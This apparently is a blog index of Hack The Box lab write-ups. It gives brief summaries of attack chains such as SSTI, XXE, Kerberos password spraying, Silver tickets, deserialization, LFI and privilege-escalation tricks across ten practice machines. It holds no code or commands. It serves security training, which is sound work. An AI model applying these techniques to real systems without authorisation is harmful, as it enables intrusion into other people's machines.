Machine Name: Red Panda
IP: 10.10.11.170
Difficulty: Easy
Red Panda is an easy machine (not really) that exploits SSTI in Java Spring Boot to get an RCE. To escalate privileges to root, enumeration of directories, permissions, identities, groups, processes, and files need to be chained together to exploit a file that runs as a cronjob as root. The main attack involves performing an XXE attack to gain access to the private key of root.
Read More
Machine Name: Scrambled
IP: 10.10.11.168
Difficulty: Medium
Scrambled is a medium machine that requires an understanding of how Kerberos works. It includes enumerating users using Kerberos’ authentication protocol’s error message and password spraying to obtain valid credentials of the found users. The obtained credentials are used to get a TGT through which the SPN and TGS are obtained. The TGS was cracked and new credentials were obtained. The new credentials did not work when logging into MsSQL Client. The TGT ticket was used to enumerate the SMB share where a PDF with information about imposed access controls was found. Only administrator accounts can access the SQL database. A Silver ticket attack was performed in order to gain access to the database where more credentials were found and a shell could be obtained. After gaining the user shell, a DLL file found was decompiled and analysed. A serialization method was being called which was exploited by crafting a payload using ysoserial to gain a administrator shell.
Read More
Machine Name: Trick
IP: 10.10.11.166
Difficulty: Easy
Trick is a moderately easy machine that demands a lot of enumeration skills. It involves finding two sub-domains that can be found through DNS zone transfer and sub-domain fuzzing. One of the sub-domains has a SQLi that can be leveraged to gather information on the server and the other sub-domain has a LFI that exposes SSH private key. This key is used to gain SSH access to the user. Since the user can restart fail2ban as root, one of fail2ban’s configuration files needed to be modified to gain a reverse shell as root.
Read More
Machine Name: Catch
IP: 10.10.11.150
Difficulty: Medium
Catch is a machine that requires reverse engineering an APK, enumerating for information in the APK file and finding API tokens. Using the tokens, we login to a dashboard which is vulnerable to injection that leads to leaking SSH credentials. These credentials are used to get the user shell. Escalating Privileges involves monitoring processes and finding a script that allows the user to inject payloads and execute them as root.
Read More
Machine Name: OpenSource
IP: 10.10.11.164
Difficulty: Easy
OpenSource like it’s name is all about exploiting information that is openly available. It demands knowledge about LFI, Docker, Flask, understanding source code, and ofcourse, Git. To get the user shell, LFI vulnerability was exploited to get RCE. Then, a docker container needed to be escaped in order to gain the user shell. Knowledge of tunneling helps to connect to the host machine and enumerate further. Ability to access the host machine lets us enumerate further and gain access to user via leaked credentials. Escalating privileges requires understanding the concept of Git hooks to exploit a process running as root. This box is great for someone who is new to programming and learning code/version management tools like Git.
Read More
Machine Name: Meta
IP: 10.10.11.140
Difficulty: Medium
Meta is a machine that involves finding a virtual host and then exploiting a vulnerability in the web application. Once exploited, it gives us a limited shell as www-data. To obtain user, we enumerate further into background processes and how they’re being run. Exploiting another vulnerability in the application, we gain access to files that would otherwise be unreadble. With that sensitive information, we gain access to the user shell and process to escalate privileges through a SUDO misconfiguration. It involves understand how the SUDO allowed binary runs and how an environment variable could be used to leverage the binary’s functionality to gain root privileges.
Read More
Machine Name: Noter
IP: 10.10.11.140
Difficulty: Medium
Noter is a machine that expects basic enumeration to lead to session cookies, JWT secrets, and credentials to servers. It teaches code review, and identification of code injections. Privilege Escalation was fairly simple as it was achieved with a public exploit that required credentials obtained during enumeration. The exploit allowed command execution as root through MySQL to gain a root shell.
Read More
Machine Name: Late
IP: 10.10.11.156
Difficulty: Easy
Late has an interesting way of exploiting Server Side Template Injection (SSTI) through image to text conversion. Once an image payload that is recognized well by the application is executed, we obtain a user level shell. To escalate privileges, simple enumeration leads to an interesting file run by root. With some understanding of file attributes, it is easy enough to run code as root to get root privileges.
Read More
Machine Name: Paper
IP: 10.10.11.143
Difficulty: Easy
Paper is a relatively easy box and teaches enumeration and a bit of reading API documentations. It forces the attacker to keep looking for sensitive information that can be utilized to run commands and eventually get a shell. To get a user shell, we find credentials on the system through a chat bot. They can be used for logging in through SSH. Another way was to find a command hidden from the ones listed by the bot by reading the API documentation or finding a scripts directory to run commands as user and get a shell. Escalating privileges as root was simple as it was vulnerable to a popular vulnerability with a simple PoC.
Read More
Machine Name: RouterSpace
IP: 10.10.11.148
Difficulty: Easy
An APK file is to be inspected to understand a feature’s inner workings. To get the user shell, the traffic was to be redirected to burp, and an RCE vulnerability through injection is to be exploited. To escalate privileges, simple enumeration leads us to a exploit POC that gives a root shell.
Read More